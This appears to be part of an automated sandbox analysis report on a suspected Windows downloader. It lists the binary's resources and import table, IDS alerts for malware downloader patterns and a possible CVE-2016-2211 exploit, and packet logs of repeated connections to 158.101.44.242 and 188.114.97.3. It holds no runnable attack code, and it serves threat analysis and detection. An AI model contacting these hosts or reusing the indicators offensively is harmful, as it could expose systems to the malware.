                                                                                                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                                      DLLImport
                                                                                                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishGreat Britain
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-06T12:44:56.794577+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                                                                                      2024-11-06T12:44:57.841475+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                                                                                      2024-11-06T12:44:58.568211+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706188.114.97.3443TCP
                                                                                                                                      2024-11-06T12:44:59.482137+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707158.101.44.24280TCP
                                                                                                                                      2024-11-06T12:45:11.927226+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549712TCP
                                                                                                                                      2024-11-06T12:45:18.401939+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549739188.114.97.3443TCP
                                                                                                                                      2024-11-06T12:45:20.867306+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549756188.114.97.3443TCP
                                                                                                                                      2024-11-06T12:45:50.535046+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549912TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 6, 2024 12:44:55.956528902 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:55.961487055 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:55.961617947 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:55.961886883 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:55.966665983 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.600788116 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.606398106 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:56.611226082 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.752413988 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.794576883 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:56.806849003 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:56.806890965 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.806961060 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:56.814582109 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:56.814593077 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.427865982 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.428028107 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.443265915 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.443284988 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.443742990 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.492851019 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.535336971 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.631458998 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.631565094 CET44349705188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.631622076 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.640256882 CET49705443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.645746946 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:57.650587082 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.795483112 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.799483061 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.799527884 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.799590111 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.800580025 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:57.800601006 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:57.841475010 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.408813000 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.416872025 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:58.416902065 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.568217993 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.568326950 CET44349706188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.568391085 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:58.569056034 CET49706443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:58.572529078 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.573704958 CET4970780192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.577773094 CET8049704158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.577836037 CET4970480192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.578520060 CET8049707158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:58.578596115 CET4970780192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.578682899 CET4970780192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:44:58.583429098 CET8049707158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:59.438713074 CET8049707158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:59.440594912 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:59.440634012 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:59.440736055 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:59.441070080 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:44:59.441082001 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:59.482136965 CET4970780192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:00.046401024 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:00.048254967 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:00.048276901 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:00.193775892 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:00.193873882 CET44349708188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:00.193923950 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:00.194403887 CET49708443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:00.199065924 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:00.203850985 CET8049709158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:00.203933001 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:00.204039097 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:00.208818913 CET8049709158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:02.887505054 CET8049709158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:02.889008045 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:02.889038086 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:02.889149904 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:02.889403105 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:02.889416933 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:02.935188055 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.496149063 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.544645071 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:03.740690947 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:03.740712881 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.877013922 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.877121925 CET44349710188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.877171993 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:03.877655029 CET49710443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:03.885411024 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.890597105 CET8049709158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.890671015 CET4970980192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.894191980 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.899055004 CET8049711158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:03.899123907 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.899218082 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:03.903951883 CET8049711158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:10.534910917 CET8049711158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:10.536179066 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:10.536221981 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:10.536309004 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:10.536570072 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:10.536577940 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:10.575822115 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.150285006 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.151875019 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:11.151906013 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.291152954 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.291241884 CET44349713188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.291327953 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:11.291858912 CET49713443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:11.296927929 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.297565937 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.302208900 CET8049711158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.302287102 CET4971180192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.302339077 CET8049716158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:11.302397966 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.302491903 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:11.307331085 CET8049716158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:15.554363012 CET8049716158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:15.555934906 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:15.555975914 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:15.556116104 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:15.556407928 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:15.556421995 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:15.607058048 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.162291050 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.175857067 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:16.175882101 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.312495947 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.312560081 CET44349727188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.312613010 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:16.313086987 CET49727443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:16.316528082 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.317691088 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.321542978 CET8049716158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.321614981 CET4971680192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.322448015 CET8049733158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:16.322514057 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.322596073 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:16.327342987 CET8049733158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:17.645628929 CET8049733158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:17.657978058 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:17.658008099 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:17.658072948 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:17.658286095 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:17.658298016 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:17.700766087 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.261924028 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.264190912 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:18.264221907 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.401947975 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.402024031 CET44349739188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.402172089 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:18.402791023 CET49739443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:18.407557011 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.408643007 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.412661076 CET8049733158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.413500071 CET8049745158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:18.413582087 CET4973380192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.413609982 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.413702965 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:18.418462992 CET8049745158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.061755896 CET8049745158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.105082035 CET49756443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:20.105103016 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.105206013 CET49756443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:20.105494022 CET49756443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:20.105500937 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.107047081 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.710412025 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.712202072 CET49756443192.168.2.5188.114.97.3
